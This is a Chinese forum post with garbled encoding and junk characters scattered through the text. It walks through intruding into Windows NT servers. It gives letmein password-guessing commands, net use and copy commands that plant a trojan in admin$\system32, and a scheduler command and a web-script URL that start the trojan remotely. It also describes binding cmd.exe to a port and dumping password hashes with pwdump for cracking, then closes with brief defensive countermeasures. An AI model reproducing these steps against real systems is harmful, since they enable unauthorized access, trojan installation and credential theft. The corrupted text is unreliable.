看了篇文章介紹使用netbus 或 netspy 遠程入侵nt系統(tǒng)����,感覺真是。�����?�?磥韓t系統(tǒng)的共享機制如果不配合火墻使用���,SMB會給你造成很大麻煩����。?��!∵B小小 只的木馬都可以讓nt管理員頭大�。
) |% B3 |. {7 g. ~3 ~+ d' N& L 其攻擊過程如下:
% [$ F% i8 B" b+ V1�����、使用掃描工具查找NT主機
2 l" ~" c7 B$ U8 g$ O9 P" j. O2 �����、確定攻擊目標(biāo)后�����,使用letmein 對目標(biāo)主機進行攻擊�����, 如:
/ H: f" ?& E1 I) R6 c- u0 S/ V5 zletmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊)
; ]# U6 A5 X9 |. f$ o4 }4 L$ ~7 kletmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊)
* m( b2 m9 F& s0 M% a# ?+ zletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶)
5 Z# L4 F3 {3 n% Z$ S注:- 確定目標(biāo)后�����,收集目標(biāo)信息并嘗試取得非法資源
2 ], Q1 } g# z9 T$ f- j3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后��,使用ms提供的合法命令: , X8 L8 |; k) u' c3 u
net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程 $ |! x2 E ^; p% V2 d1 D
copy x:\netserver.exe \\x.x.x.x\admin$\system32
" c; P6 L7 G2 D( f4��、使用合法ms命令遠程啟動木馬服務(wù): . s/ V- w! Y% x% _
netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg
8 J* W& S9 H& N) B) S8 l
3 ?4 e! r5 n" w J0 R' A, o0 D+ g 該方法有其巧妙之處�。。利用nt的任務(wù)計劃管理���,在特定時候啟動木馬服務(wù)
, W' l/ U: n- y
8 \* }( L/ V s* @, C 另一種方法: 3 T2 @ B; l7 p* v3 J
將ntsrver.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts�,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動
" C6 F, P. X# A% g- I! m1 }
# o( C$ l8 r6 j9 r: v 到此,該次攻擊可以算成功了�����,遠程資源已在別人控制下��。
+ ^8 b8 _! c3 \6 r 如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口�����,更方便使用該遠程資源 ����。比如:使用pwdump 將遠程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運算���。 分析該次攻擊的整體過程����,不難看出�����,關(guān)鍵步驟是letmein取得admin權(quán)限�����,但是很不幸��,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言�,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務(wù)器進行掃描的結(jié)果�,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上�。而且在這些被進入的機器上,SMB都有在tcp/ip上 跑��,有兩臺有配備火墻����,但是沒有封閉對外137-139口��。 ! E% G4 c# H) q$ l* Y
. a. D; z: H$ _5 u. S 對策: " R5 [+ `* J, c6 q# o6 Q
1��、還是老話�����,密碼的選擇問題�,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉�����。
0 D: n) f* R% |2 D2��、nt網(wǎng)絡(luò)的適當(dāng)配置�,不要在對外的nc綁定共享服務(wù)是個好習(xí)慣�,特別是tcp/ip協(xié)議。 ; u2 U3 C; k* J2 _
3�����、防火墻的配置���,屏蔽一切不需要的服務(wù)端口����,象netebui在tcp/ip上的137-139口,開這些口只會使你的系統(tǒng)處于危險的處境��,如果非要在遠程使用這些口的服務(wù)�����,建議使用其他軟件來代替���。
8 f2 r, f7 S+ ~3 r- T! d& z4�����、及時檢查日記和監(jiān)控服務(wù)的運行���,定時對文件系統(tǒng)的權(quán)限受托關(guān)系進行檢查。 + a6 `# M* \8 y/ a/ x$ J% C a4 }
5�����、管理人員素質(zhì)的提高�,安全風(fēng)險意思加強無疑對你管理的系統(tǒng)有很多好處�。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 ���。6 ~( V7 d# }! K6 c$ U2 d A
|
發(fā)表于 2011-1-12 16:31:02
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡